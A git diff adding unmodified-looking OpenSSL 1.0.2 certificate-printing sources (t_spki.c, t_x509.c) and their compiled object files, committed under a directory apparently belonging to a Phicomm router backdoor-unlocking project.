+    BIO_printf(out, "  Public Key Algorithm: %s\n",
+               (i == NID_undef) ? "UNKNOWN" : OBJ_nid2ln(i));
+    pkey = X509_PUBKEY_get(spki->spkac->pubkey);
+    if (!pkey)
+        BIO_printf(out, "  Unable to load public key\n");
+    else {
+        EVP_PKEY_print_public(out, pkey, 4, NULL);
+        EVP_PKEY_free(pkey);
+    }
+    chal = spki->spkac->challenge;
+    if (chal->length)
+        BIO_printf(out, "  Challenge String: %s\n", chal->data);
+    i = OBJ_obj2nid(spki->sig_algor->algorithm);
+    BIO_printf(out, "  Signature Algorithm: %s",
+               (i == NID_undef) ? "UNKNOWN" : OBJ_nid2ln(i));
+
+    n = spki->signature->length;
+    s = (char *)spki->signature->data;
+    for (i = 0; i < n; i++) {
+        if ((i % 18) == 0)
+            BIO_write(out, "\n      ", 7);
+        BIO_printf(out, "%02x%s", (unsigned char)s[i],
+                   ((i + 1) == n) ? "" : ":");
+    }
+    BIO_write(out, "\n", 1);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_spki.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_spki.o
new file mode 100644
index 0000000000000000000000000000000000000000..479cbba2a56b0b7411979534c875f529d04508c8
GIT binary patch
literal 3400
zcmbW4UuauZ7{I?Y%^K@=TelADruBkUBHBxmt@aNpxk=OB*pS3E>6|(*H|cE>n<g>2
zVeQ0CC>@5_>B|&f#7BMbP5e_3!aAIapa_DXqA#Md2ayS)DD`~zp0k|XCO+(=_nhzi
z&i8%i-1FzV>G^PUw#VTBCJuN6S}jHaKDni(2TU~p0vv$r10#RSCw)zMQBKLplv4k9
zL8)I?w#L!sv0t!M8cwA_O7b^pfvv;HH=9O({i;Rkm#K?V|IOEIxmga8`W0ofSv$1H
z=Gqao|8%<-hpB&T`bFzMxBLU{jY%*LD~*JEkF(MUxouObUnP@r|Id^{gVC*raq_-z
zXBwVpqwJRJ-^o+opNr4bfBf(u>3IFmzc#<B4Q=<~l&obSb2LNByI16a_l8DDTiH5*
zQNmL{QJcs>_zPcC+1)WMuf4sEn_wE6D{0avK0x^7Y56JnwEVQJ?xbS#vG~atOasJp
zqngpmy10;-k4*Q2C?;y@LOvtT>+7Oi$d)R3Beyy&j#jZRRn*c2T{KE!p`<N|Wy^F$
zU&qc+PAe4jVwS`*D*0lTIW6R~Ma`&H^!9krFPZ|QUjN!?75V|@LZNBVlS<c$MopZO
zj!E7z-$c!9`p)^ilK1$176!nb8zhg5Jae%W^Z+!GImv@EWL4ledjcG5gN~#7``oXP
zWrz}fC+&M4mt|HMe7R>v7{2HX3gT98Q1HCuk_GRDeKW%3M&G;;aK;_N<gDP81rM<Z
z3d2ERFetcbjBXW%?uFlXJM}v|-V~fWn|-^N(|p@@hApT0_MJE$qP^mT&a-v`cS)%m
z*$pBtxRth9HDD^Z>g{5!w+oK8W4Oa?yI{h`M<`F)_&t;tY}`Y+{SC$_zhJZXQ*OOS
ztJ9i?3of>hsXavPFWERYov?2Y4H9yY+eh;(5w=JkJePLC_vysXbm1FaIL^CMoHx4g
zcf0V*T{swOwY-v-G9X1m$FT5XaU6?rEFQ#S0t+7&lUVq%m@=6cV&UXMNKS-R%qVJ^
zWC8=!xoA8nN7eZ3>_RxHCgor>tU@pnxB8bM9(+_SrJwN^^Gl{qYJZ^!kB@t&)I=&c
zA3mjKbpyhS2{nNYGpuUmpB7!N=(-v849QwLc|)M*4=_KNr~IE?OYSy%tvqr&(HZx0
ze3;|x{9+tDQ_LRE0Se|GJnM{Oo<Tu-yhDuR`9MK?eq7C@7C%CCW?!Zp<Lu}7S<3Bk
z*ttfIcag<;m9xkE$M`#xV|@IyF#bN}_V_y-=hx>m$}tYVK3{Y8{QCUB*$YHx<NnIo
z^Xu~mXOB6E*^8KHiQu?+FBtbwj`P2Z<I|k|Z5*HBIDU><oD*Ceem)t_{t#!M<Lvoy
zMPh@3^Tg+dNY(XKLra5HH7Zt}V_HQoXp*6?86Yibh6Yl)S_P?6!UmfAByt5arPWoP
zTrsIwGIWW23dgF3mRX_gY_TSlE2XktG1iGI2Gn!vaz$IUuE&jO+^ixJM|@>_h71sf
z!t$ckvTT`-HJ(x2qX2n$d5Z>okuDbAAsmP0e>{6A_mT&>{mc0g-3PSc#f~2!ofz|G
z{e8q2V_M%EqEKPuzs3Nq+4!su5RN*_JJbx4^u6zAfY!{9)e*v(&YPZZJ7ldMyX`5`
zg})Z;<}Xknwp>k(tv|!h5(Q)0{okY@#|&w0_s8#Ir~UWRpCoLbasLr9f5tnFjYGNV
thJH!sfw>d^d$9XsO#9vw1mDn~IG<yK6Z`sM4(a5t(D^^d`J!s~{}1_DBEbLv

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509.c
new file mode 100644
index 0000000..8aab551
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509.c
@@ -0,0 +1,555 @@
+/* crypto/asn1/t_x509.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_EC
+# include <openssl/ec.h>
+#endif
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include "asn1_locl.h"
+
+#ifndef OPENSSL_NO_FP_API
+int X509_print_fp(FILE *fp, X509 *x)
+{
+    return X509_print_ex_fp(fp, x, XN_FLAG_COMPAT, X509_FLAG_COMPAT);
+}
+
+int X509_print_ex_fp(FILE *fp, X509 *x, unsigned long nmflag,
+                     unsigned long cflag)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        X509err(X509_F_X509_PRINT_EX_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = X509_print_ex(b, x, nmflag, cflag);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int X509_print(BIO *bp, X509 *x)
+{
+    return X509_print_ex(bp, x, XN_FLAG_COMPAT, X509_FLAG_COMPAT);
+}
+
+int X509_print_ex(BIO *bp, X509 *x, unsigned long nmflags,
+                  unsigned long cflag)
+{
+    long l;
+    int ret = 0, i;
+    char *m = NULL, mlch = ' ';
+    int nmindent = 0;
+    X509_CINF *ci;
+    ASN1_INTEGER *bs;
+    EVP_PKEY *pkey = NULL;
+    const char *neg;
+
+    if ((nmflags & XN_FLAG_SEP_MASK) == XN_FLAG_SEP_MULTILINE) {
+        mlch = '\n';
+        nmindent = 12;
+    }
+
+    if (nmflags == X509_FLAG_COMPAT)
+        nmindent = 16;
+
+    ci = x->cert_info;
+    if (!(cflag & X509_FLAG_NO_HEADER)) {
+        if (BIO_write(bp, "Certificate:\n", 13) <= 0)
+            goto err;
+        if (BIO_write(bp, "    Data:\n", 10) <= 0)
+            goto err;
+    }
+    if (!(cflag & X509_FLAG_NO_VERSION)) {
+        l = X509_get_version(x);
+        if (BIO_printf(bp, "%8sVersion: %lu (0x%lx)\n", "", l + 1, l) <= 0)
+            goto err;
+    }
+    if (!(cflag & X509_FLAG_NO_SERIAL)) {
+
+        if (BIO_write(bp, "        Serial Number:", 22) <= 0)
+            goto err;
+
+        bs = X509_get_serialNumber(x);
+        if (bs->length <= (int)sizeof(long)) {
+            l = ASN1_INTEGER_get(bs);
+            if (bs->type == V_ASN1_NEG_INTEGER) {
+                l = -l;
+                neg = "-";
+            } else
+                neg = "";
+            if (BIO_printf(bp, " %s%lu (%s0x%lx)\n", neg, l, neg, l) <= 0)
+                goto err;
+        } else {
+            neg = (bs->type == V_ASN1_NEG_INTEGER) ? " (Negative)" : "";
+            if (BIO_printf(bp, "\n%12s%s", "", neg) <= 0)
+                goto err;
+
+            for (i = 0; i < bs->length; i++) {
+                if (BIO_printf(bp, "%02x%c", bs->data[i],
+                               ((i + 1 == bs->length) ? '\n' : ':')) <= 0)
+                    goto err;
+            }
+        }
+
+    }
+
+    if (!(cflag & X509_FLAG_NO_SIGNAME)) {
+        if (X509_signature_print(bp, ci->signature, NULL) <= 0)
+            goto err;
+#if 0
+        if (BIO_printf(bp, "%8sSignature Algorithm: ", "") <= 0)
+            goto err;
+        if (i2a_ASN1_OBJECT(bp, ci->signature->algorithm) <= 0)
+            goto err;
+        if (BIO_puts(bp, "\n") <= 0)
+            goto err;
+#endif
+    }
+
+    if (!(cflag & X509_FLAG_NO_ISSUER)) {
+        if (BIO_printf(bp, "        Issuer:%c", mlch) <= 0)
+            goto err;
+        if (X509_NAME_print_ex(bp, X509_get_issuer_name(x), nmindent, nmflags)
+            < 0)
+            goto err;
+        if (BIO_write(bp, "\n", 1) <= 0)
+            goto err;
+    }
+    if (!(cflag & X509_FLAG_NO_VALIDITY)) {
+        if (BIO_write(bp, "        Validity\n", 17) <= 0)
+            goto err;
+        if (BIO_write(bp, "            Not Before: ", 24) <= 0)
+            goto err;
+        if (!ASN1_TIME_print(bp, X509_get_notBefore(x)))
+            goto err;
+        if (BIO_write(bp, "\n            Not After : ", 25) <= 0)
+            goto err;
+        if (!ASN1_TIME_print(bp, X509_get_notAfter(x)))
+            goto err;
+        if (BIO_write(bp, "\n", 1) <= 0)
+            goto err;
+    }
+    if (!(cflag & X509_FLAG_NO_SUBJECT)) {
+        if (BIO_printf(bp, "        Subject:%c", mlch) <= 0)
+            goto err;
+        if (X509_NAME_print_ex
+            (bp, X509_get_subject_name(x), nmindent, nmflags) < 0)
+            goto err;
+        if (BIO_write(bp, "\n", 1) <= 0)
+            goto err;
+    }
+    if (!(cflag & X509_FLAG_NO_PUBKEY)) {
+        if (BIO_write(bp, "        Subject Public Key Info:\n", 33) <= 0)
+            goto err;
+        if (BIO_printf(bp, "%12sPublic Key Algorithm: ", "") <= 0)
+            goto err;
+        if (i2a_ASN1_OBJECT(bp, ci->key->algor->algorithm) <= 0)
+            goto err;
+        if (BIO_puts(bp, "\n") <= 0)
+            goto err;
+
+        pkey = X509_get_pubkey(x);
+        if (pkey == NULL) {
+            BIO_printf(bp, "%12sUnable to load Public Key\n", "");
+            ERR_print_errors(bp);
+        } else {
+            EVP_PKEY_print_public(bp, pkey, 16, NULL);
+            EVP_PKEY_free(pkey);
+        }
+    }
+
+    if (!(cflag & X509_FLAG_NO_IDS)) {
+        if (ci->issuerUID) {
+            if (BIO_printf(bp, "%8sIssuer Unique ID: ", "") <= 0)
+                goto err;
+            if (!X509_signature_dump(bp, ci->issuerUID, 12))
+                goto err;
+        }
+        if (ci->subjectUID) {
+            if (BIO_printf(bp, "%8sSubject Unique ID: ", "") <= 0)
+                goto err;
+            if (!X509_signature_dump(bp, ci->subjectUID, 12))
+                goto err;
+        }
+    }
+
+    if (!(cflag & X509_FLAG_NO_EXTENSIONS))
+        X509V3_extensions_print(bp, "X509v3 extensions",
+                                ci->extensions, cflag, 8);
+
+    if (!(cflag & X509_FLAG_NO_SIGDUMP)) {
+        if (X509_signature_print(bp, x->sig_alg, x->signature) <= 0)
+            goto err;
+    }
+    if (!(cflag & X509_FLAG_NO_AUX)) {
+        if (!X509_CERT_AUX_print(bp, x->aux, 0))
+            goto err;
+    }
+    ret = 1;
+ err:
+    if (m != NULL)
+        OPENSSL_free(m);
+    return (ret);
+}
+
+int X509_ocspid_print(BIO *bp, X509 *x)
+{
+    unsigned char *der = NULL;
+    unsigned char *dertmp;
+    int derlen;
+    int i;
+    unsigned char SHA1md[SHA_DIGEST_LENGTH];
+
+    /*
+     * display the hash of the subject as it would appear in OCSP requests
+     */
+    if (BIO_printf(bp, "        Subject OCSP hash: ") <= 0)
+        goto err;
+    derlen = i2d_X509_NAME(x->cert_info->subject, NULL);
+    if ((der = dertmp = (unsigned char *)OPENSSL_malloc(derlen)) == NULL)
+        goto err;
+    i2d_X509_NAME(x->cert_info->subject, &dertmp);
+
+    if (!EVP_Digest(der, derlen, SHA1md, NULL, EVP_sha1(), NULL))
+        goto err;
+    for (i = 0; i < SHA_DIGEST_LENGTH; i++) {
+        if (BIO_printf(bp, "%02X", SHA1md[i]) <= 0)
+            goto err;
+    }
+    OPENSSL_free(der);
+    der = NULL;
+
+    /*
+     * display the hash of the public key as it would appear in OCSP requests
+     */
+    if (BIO_printf(bp, "\n        Public key OCSP hash: ") <= 0)
+        goto err;
+
+    if (!EVP_Digest(x->cert_info->key->public_key->data,
+                    x->cert_info->key->public_key->length,
+                    SHA1md, NULL, EVP_sha1(), NULL))
+        goto err;
+    for (i = 0; i < SHA_DIGEST_LENGTH; i++) {
+        if (BIO_printf(bp, "%02X", SHA1md[i]) <= 0)
+            goto err;
+    }
+    BIO_printf(bp, "\n");
+
+    return (1);
+ err:
+    if (der != NULL)
+        OPENSSL_free(der);
+    return (0);
+}
+
+int X509_signature_dump(BIO *bp, const ASN1_STRING *sig, int indent)
+{
+    const unsigned char *s;
+    int i, n;
+
+    n = sig->length;
+    s = sig->data;
+    for (i = 0; i < n; i++) {
+        if ((i % 18) == 0) {
+            if (BIO_write(bp, "\n", 1) <= 0)
+                return 0;
+            if (BIO_indent(bp, indent, indent) <= 0)
+                return 0;
+        }
+        if (BIO_printf(bp, "%02x%s", s[i], ((i + 1) == n) ? "" : ":") <= 0)
+            return 0;
+    }
+    if (BIO_write(bp, "\n", 1) != 1)
+        return 0;
+
+    return 1;
+}
+
+int X509_signature_print(BIO *bp, X509_ALGOR *sigalg, ASN1_STRING *sig)
+{
+    int sig_nid;
+    if (BIO_puts(bp, "    Signature Algorithm: ") <= 0)
+        return 0;
+    if (i2a_ASN1_OBJECT(bp, sigalg->algorithm) <= 0)
+        return 0;
+
+    sig_nid = OBJ_obj2nid(sigalg->algorithm);
+    if (sig_nid != NID_undef) {
+        int pkey_nid, dig_nid;
+        const EVP_PKEY_ASN1_METHOD *ameth;
+        if (OBJ_find_sigid_algs(sig_nid, &dig_nid, &pkey_nid)) {
+            ameth = EVP_PKEY_asn1_find(NULL, pkey_nid);
+            if (ameth && ameth->sig_print)
+                return ameth->sig_print(bp, sigalg, sig, 9, 0);
+        }
+    }
+    if (sig)
+        return X509_signature_dump(bp, sig, 9);
+    else if (BIO_puts(bp, "\n") <= 0)
+        return 0;
+    return 1;
+}
+
+int ASN1_STRING_print(BIO *bp, const ASN1_STRING *v)
+{
+    int i, n;
+    char buf[80];
+    const char *p;
+
+    if (v == NULL)
+        return (0);
+    n = 0;
+    p = (const char *)v->data;
+    for (i = 0; i < v->length; i++) {
+        if ((p[i] > '~') || ((p[i] < ' ') &&
+                             (p[i] != '\n') && (p[i] != '\r')))
+            buf[n] = '.';
+        else
+            buf[n] = p[i];
+        n++;
+        if (n >= 80) {
+            if (BIO_write(bp, buf, n) <= 0)
+                return (0);
+            n = 0;
+        }
+    }
+    if (n > 0)
+        if (BIO_write(bp, buf, n) <= 0)
+            return (0);
+    return (1);
+}
+
+int ASN1_TIME_print(BIO *bp, const ASN1_TIME *tm)
+{
+    if (tm->type == V_ASN1_UTCTIME)
+        return ASN1_UTCTIME_print(bp, tm);
+    if (tm->type == V_ASN1_GENERALIZEDTIME)
+        return ASN1_GENERALIZEDTIME_print(bp, tm);
+    BIO_write(bp, "Bad time value", 14);
+    return (0);
+}
+
+static const char *mon[12] = {
+    "Jan", "Feb", "Mar", "Apr", "May", "Jun",
+    "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"
+};
+
+int ASN1_GENERALIZEDTIME_print(BIO *bp, const ASN1_GENERALIZEDTIME *tm)
+{
+    char *v;
+    int gmt = 0;
+    int i;
+    int y = 0, M = 0, d = 0, h = 0, m = 0, s = 0;
+    char *f = NULL;
+    int f_len = 0;
+
+    i = tm->length;
+    v = (char *)tm->data;
+
+    if (i < 12)
+        goto err;
+    if (v[i - 1] == 'Z')
+        gmt = 1;
+    for (i = 0; i < 12; i++)
+        if ((v[i] > '9') || (v[i] < '0'))
+            goto err;
+    y = (v[0] - '0') * 1000 + (v[1] - '0') * 100
+        + (v[2] - '0') * 10 + (v[3] - '0');
+    M = (v[4] - '0') * 10 + (v[5] - '0');
+    if ((M > 12) || (M < 1))
+        goto err;
+    d = (v[6] - '0') * 10 + (v[7] - '0');
+    h = (v[8] - '0') * 10 + (v[9] - '0');
+    m = (v[10] - '0') * 10 + (v[11] - '0');
+    if (tm->length >= 14 &&
+        (v[12] >= '0') && (v[12] <= '9') &&
+        (v[13] >= '0') && (v[13] <= '9')) {
+        s = (v[12] - '0') * 10 + (v[13] - '0');
+        /* Check for fractions of seconds. */
+        if (tm->length >= 15 && v[14] == '.') {
+            int l = tm->length;
+            f = &v[14];         /* The decimal point. */
+            f_len = 1;
+            while (14 + f_len < l && f[f_len] >= '0' && f[f_len] <= '9')
+                ++f_len;
+        }
+    }
+
+    if (BIO_printf(bp, "%s %2d %02d:%02d:%02d%.*s %d%s",
+                   mon[M - 1], d, h, m, s, f_len, f, y,
+                   (gmt) ? " GMT" : "") <= 0)
+        return (0);
+    else
+        return (1);
+ err:
+    BIO_write(bp, "Bad time value", 14);
+    return (0);
+}
+
+int ASN1_UTCTIME_print(BIO *bp, const ASN1_UTCTIME *tm)
+{
+    const char *v;
+    int gmt = 0;
+    int i;
+    int y = 0, M = 0, d = 0, h = 0, m = 0, s = 0;
+
+    i = tm->length;
+    v = (const char *)tm->data;
+
+    if (i < 10)
+        goto err;
+    if (v[i - 1] == 'Z')
+        gmt = 1;
+    for (i = 0; i < 10; i++)
+        if ((v[i] > '9') || (v[i] < '0'))
+            goto err;
+    y = (v[0] - '0') * 10 + (v[1] - '0');
+    if (y < 50)
+        y += 100;
+    M = (v[2] - '0') * 10 + (v[3] - '0');
+    if ((M > 12) || (M < 1))
+        goto err;
+    d = (v[4] - '0') * 10 + (v[5] - '0');
+    h = (v[6] - '0') * 10 + (v[7] - '0');
+    m = (v[8] - '0') * 10 + (v[9] - '0');
+    if (tm->length >= 12 &&
+        (v[10] >= '0') && (v[10] <= '9') && (v[11] >= '0') && (v[11] <= '9'))
+        s = (v[10] - '0') * 10 + (v[11] - '0');
+
+    if (BIO_printf(bp, "%s %2d %02d:%02d:%02d %d%s",
+                   mon[M - 1], d, h, m, s, y + 1900,
+                   (gmt) ? " GMT" : "") <= 0)
+        return (0);
+    else
+        return (1);
+ err:
+    BIO_write(bp, "Bad time value", 14);
+    return (0);
+}
+
+int X509_NAME_print(BIO *bp, X509_NAME *name, int obase)
+{
+    char *s, *c, *b;
+    int ret = 0, l, i;
+
+    l = 80 - 2 - obase;
+
+    b = X509_NAME_oneline(name, NULL, 0);
+    if (!b)
+        return 0;
+    if (!*b) {
+        OPENSSL_free(b);
+        return 1;
+    }
+    s = b + 1;                  /* skip the first slash */
+
+    c = s;
+    for (;;) {
+#ifndef CHARSET_EBCDIC
+        if (((*s == '/') &&
+             ((s[1] >= 'A') && (s[1] <= 'Z') && ((s[2] == '=') ||
+                                                 ((s[2] >= 'A')
+                                                  && (s[2] <= 'Z')
+                                                  && (s[3] == '='))
+              ))) || (*s == '\0'))
+#else
+        if (((*s == '/') &&
+             (isupper(s[1]) && ((s[2] == '=') ||
+                                (isupper(s[2]) && (s[3] == '='))
+              ))) || (*s == '\0'))
+#endif
+        {
+            i = s - c;
+            if (BIO_write(bp, c, i) != i)
+                goto err;
+            c = s + 1;          /* skip following slash */
+            if (*s != '\0') {
+                if (BIO_write(bp, ", ", 2) != 2)
+                    goto err;
+            }
+            l--;
+        }
+        if (*s == '\0')
+            break;
+        s++;
+        l--;
+    }
+
+    ret = 1;
+    if (0) {
+ err:
+        X509err(X509_F_X509_NAME_PRINT, ERR_R_BUF_LIB);
+    }
+    OPENSSL_free(b);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509.o
new file mode 100644
index 0000000000000000000000000000000000000000..151392732a770c5dbee830794869435d1d5c56cc
GIT binary patch
literal 13328
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
